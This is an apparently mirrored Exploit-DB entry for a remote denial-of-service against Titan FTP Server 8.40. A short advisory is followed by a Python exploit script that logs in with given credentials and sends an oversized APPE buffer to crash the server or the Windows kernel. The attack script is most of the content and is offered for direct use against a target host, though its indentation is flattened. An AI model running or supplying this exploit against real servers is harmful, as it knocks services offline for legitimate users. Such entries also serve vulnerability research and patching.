Titan FTP Server 8.40 – ‘APPE’ Remote Denial of Service

  • 作者: Houssam Sahli
    日期: 2011-11-25
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/36361/
  • source: https://www.securityfocus.com/bid/50819/info

Titan FTP Server is prone to a remote denial-of-service vulnerability.

Exploiting this issue allows remote attackers to crash the affected FTP server, denying service to legitimate users.

Titan FTP Server 8.40 is vulnerable; other versions may also be affected. 

#!/usr/bin/python
#
# Exploit Title : Titan FTP Server 8.40 DoS Kernel Crash
# Date: 25/11/2011
# Author: Houssam Sahli
# Software Link (trial version) : http://southrivertech.com/software/demosoft/titanftp.exe
# Version: 8.40
# Developed by : South River Technologies, Inc.
# Tested on: Windows XP SP3 French
# Description : This exploit crashs the kernel of a Windows running TITAN FTP Server 8.40 and succeed the magical "blue screen of death".
# Thanks to : Mehdi Boukazoula and Rwissi Networking for their support ;)...because we can improve computer security in Algeria, we'll do it.

print "\n2ctUtjjJUJUJUJUJjJUJtJtJUUtjfUtt2UftftfUftft1t1tFfF21fhf11Ft"
print "ULcYLYLYLcLc7LLcLccJcJYJYJYjJtJjJtjtJtJtUtjUJjJUJtJUJtjtUtUj"
print "tLUJjJJcJcJcJcJYjhPX0Pb99pb9EbMEDEDEMDZbZDD0XfFf1f2tFf22F21U"
print "JYJJcJcJcJcJcJcJ2 1hf1f1f1212h2h1f"
print "ULJcJcJLYLL7L7L71Houssam Sahli1h1f2f2fFt1fF1Ft"
print "ULJcJcJLYLL7L7L71 backtronux@gmail.com1h1f2f2fFt1fF1Ft"
print "JccJcY7Lr7777LrLY 1ht2t1t1f1t12F12"
print "J7JLcr7r777777L7cUF1hfU7r:i:i:i:rirrj2MRQMMbhf1t2t1tFf1f1tFU"
print "Y7cLr777r7rrrrrrrLr:, .LPRQQQQQQQQDX7:.:7SpXfFt1f1t121th2Fft"
print "J7crc77rriririri: ,:tQQQQQQQQQQQQQQQQQRJ:,i19FFf1t2f2f21hfFU"
print "Y7r777rrii:i:::JQQQQQQPFfS0MM02hftXQRZPc, ipXSf1t2t1t1fF2f"
print "Jr777rrii::::, ,QQQQQQQi..::::i:irRR.,hfL7L:JpSf1tFt12h1Ft"
print "cr7c77rri:::7QQQQQQQ1:Et7jjJ7Lrr7r.ci::i7. iPS22fFf12F12"
print "Jr7LLrrir:iEQQQQQQQQr:QQQQQ9L7Lri., i.::rtY :hSf1f121fFU"
print "c7rL77rrrr. DQQQQQQQQQ:::riri77c77i..ri7LfE9 ihh2Ffhfhf2"
print "j7crc77r7i UQQQjrir:rQQFcii:ii77Lrr.,f11PpZQZ.JFF1h2F1hf"
print "JLcLrLLLL..QQQc.irr7i0QQQQQMhUrr7Lrr:., :Q9QQQQQQh:1t2tft1f2"
print "J7Jcc7LLJ cQQQQL:i777irUMQQQQQQL77L77rr:pJ:7PQQQQQ:Jhf1tFt2J"
print "JccJcc7c7 2QQQQQE7:r7Lri:r7hDQQQ7LLYLJLc7rrr::XQQQ.jFF1h1h11"
print "tLjJJcJJJ bQQQQQQQRULr77Lrriii7LcLYLYLYLLLc77:cQQQ7cX2h2h2hf"
print "jJJUJjJtY 0QQQQQQQQQ0Mt7rrr777777L7LLcLc7c77::ZQQQJJFh2h2FF1"
print "tLUjjYUjt,tQQQQQQQS.QQQF7iiirr77L7L7L77ii:LMQQQQ72S1h1h1Sf"
print "tjjtjjJff:.QQQQQQQQ::QQQMpftJc7c77rriLhQQQQQQf:02h1h1F12"
print "2J2UfUttFJ,Q: QQb YQQQQQQQQQQQQQQQQQQQQQQ tXF2F1F2hU"
print "fjf2Uft2thrr :L, , QQQQQQQQQribF2h2F1h22"
print "FJ1t2t2t22hrt,, ,,, ,tPJ7 :QQQQQQQQU:bS2h2hfF2h2"
print "tUt1t2f1t11SLS.,,,,,,,,,,,,, .rt. QQQ1Sp1p2r9Xfh2h2F2h1F"
print "1J1t2t1t2t12SYhr,,,,,,,,,,, .QQF..tbS2F1F2F1F1hf"
print "ftf1f1f1t2f12Xt2L. ,,,,,,,,,,,,, fQf .fR0Ffh1h1h2h1F21"
print "hUFt1t1f2t2t1fXhFUL:, , ,: .jRRSF2h2h1h1SFF2Sf"
print "2f2FfF2Ff12122fhFphhJ7:. ,:JpRR0212FFh1S1h2hFhF1"
print "hUF21fFf12Ffh2F2h1XX9X9SXffjUccLcJtfpERZESh1hFhFSFS1hFS1S1Sf\n"

print "\nYou need a valid account to succeed this DoS, but even anonymous can do it as long as it has permission to call APPE command.\n"

import socket
import sys
 
def Usage():
print ("Usage: ./expl.py <host> <Username> <password>\n")
buffer= "./A" * 2000
def start(hostname, username, passwd):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] " + r
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] wait for the crash...;)"
sock.send("APPE %s\r\n" %buffer)
sock.close()
 
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
start(hostname,username,passwd)
sys.exit(0)